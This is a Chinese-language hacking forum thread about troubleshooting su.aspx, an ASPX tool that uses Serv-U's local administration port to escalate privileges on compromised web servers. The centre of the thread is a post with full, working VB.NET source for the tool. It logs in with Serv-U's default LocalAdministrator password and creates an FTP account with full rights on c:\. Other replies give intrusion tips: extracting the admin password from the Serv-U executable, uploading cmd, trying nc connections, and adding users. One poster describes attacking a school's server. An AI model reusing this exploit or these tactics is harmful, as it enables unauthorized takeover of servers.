[讨论]运行SERV-U.ASPX提权时遇到的问题
议题作者:hehe765信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
1.System.Net.Sockets.SocketException: 由于套接字没有连接并且 (当使用一个 sendto 调用发送数据报套接字时) 没有提供地址,发送或接收数据的请求没有被接受。 at System.Net.Sockets.TcpClient.Connect(String hostname, Int32 port) at ASP._1_aspx.BTN_Start_Click(Object sender, EventArgs e) in D:\wwwroot\XXXX\conn\1.aspx:line 31
请教下高手,俺们不懂
2.System.Net.Sockets.SocketException: 由于目标机器积极拒绝,无法连接。 at System.Net.Sockets.TcpClient.Connect(String hostname, Int32 port) at ASP._1_aspx.BTN_Start_Click(Object sender, EventArgs e) in D:\vhostroot\LocalUser\xxxxx\www\1.aspx:line 31
这个可能有防火墙或者作了限制,无法连接,可以理解
以上是遇到的问题,很多情况下都是可以成功!但最近好象遇到几个都不行!
运行aspx木马是正常使用,为何SERV-U.ASPX不成功 大家讨论下
有没有好方法! 说实话我也看不懂,但是我分析第一种原因是服务器缺少这个.net脚本所需要的文件。第2个的原因是目标主机使用的ftp管理端并非是su。
话转回来说,你这样放你的脚本木马未免太露骨了吧。其实su.aspx的确是方便好用,但是我还是觉得用应用程序的溢出提权比较好,既然支持aspx,传一个cmd到可写目录,然后利用这个cmd是绝对可以执行命令的。 看样子好像是43958端口连不上,可以检查一下 直接用SERVU。EXE我十次有九次不成功!
现在好象都设置了。。。。。。
放个CMD只能执行一般命令
SERVU。ASPX得到的管理员权限!
我在放个CMD试了多次NC做连接都不成功
ASPX成功到是很多的
======================= 我也遇到过这种问题,后来通过别的途径进去后查看了配置,原来43958端口被修改过了,我遇到一次,竟然是杀毒软件搞的鬼。现在的杀毒软件还真是喜欢多管闲事! 我习惯在原有的域上加用户
改装下。
[code]<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">
'
' Love, Where are you ?
Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewUsera As String=Text_NewUser.Text
Dim NewPass As String=Text_NewPass.Text
Dim NewPort As String=Text_NewPort.Text
Dim NewPath As String=Text_NewPath.Text
Dim NewIp As String=Text_NewIp.Text
NewIp=NewIp & vbcrlf
NewPort=NewPort & vbcrlf
NewUsera=NewUsera & vbcrlf
NewPass=NewPass & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP="& NewIp & "-PortNo="& NewPort & "-User="& NewUsera & "-Password=" & NewPass & _
"-HomeDir=" & NewPath & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & NewPath & "|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf
'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub
Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub
Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub
</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2 and modified by acaa @20060428</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">newUser</asp:Label>
<asp:TextBox id="Text_NewUser" runat="server">aaa</asp:TextBox>
<br />
<asp:Label id="Label6" runat="server" width="40px">newPass</asp:Label>
<asp:TextBox id="Text_NewPass" runat="server">aaa</asp:TextBox>
<br />
<asp:Label id="Label7" runat="server" width="40px">newPort</asp:Label>
<asp:TextBox id="Text_NewPort" runat="server">21</asp:TextBox>
<br />
<asp:Label id="Label8" runat="server" width="40px">newPath</asp:Label>
<asp:TextBox id="Text_NewPath" runat="server">c:\\</asp:TextBox>
<br />
<asp:Label id="Label9" runat="server" width="40px">newIp</asp:Label>
<asp:TextBox id="Text_NewIp" runat="server">0.0.0.0</asp:TextBox>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- Insert content here -->
</p>
</form>
</body>
</html>
[/code] 我遇到这样的情况 出现了 什么 目标机器积极拒绝
不过我看了看执行了su.aspx的结果 我哪个最开始就显示出了 localadministrator这个用户并没有登陆进去servu的信息 于是我在all user 的程序里下载了servu的快捷方式 本地打开以后 看到了路径 用aspx马默认的哪个user权限成功跳转到哪个目录下 下载了哪个什么***admin.exe文件回来 反正就是开启servu的哪个文件 本地用16进制编辑器打开 搜索一下 localadministrator 在附近找找 很容易就找到了servu的内置管理员的真正密码 重新修改下su.aspx 执行就ok了
不过你这个情况 1.System.Net.Sockets.SocketException: 由于套接字没有连接并且 (当使用一个 sendto 调用发送数据报套接字时) 没有提供地址,发送或接收数据的请求没有被接受。 at System.Net.Sockets.TcpClient.Connect(String hostname, Int32 port) at ASP._1_aspx.BTN_Start_Click(Object sender, EventArgs e) in D:\wwwroot\XXXX\conn\1.aspx:line 31
我好象没注意到有还是没有
不管怎么说 你先试一下看看是不是密码不对的缘故吧 我也遇过这样的问题,他的su是6.4的,43958开着、密码用户名都默认
用asp、aspx都无法提权成功,闷死 [quote]引用第7楼fsfox于2007-09-09 15:55发表的 :
我也遇过这样的问题,他的su是6.4的,43958开着、密码用户名都默认
用asp、aspx都无法提权成功,闷死[/quote]
不是说漏洞只到6.2版本么?
我遇到学校都额服务器,6.2的,默认用户名,密码,看了没改,但是好像跟以前看到的不一样,位置换了一下[s:289],然后asp,aspx的都不成功。
不知道哪个大哥能指点下。 本地设置了管理密码。所以连不上。连接被拒绝了。~ [s:266]
页:
[1]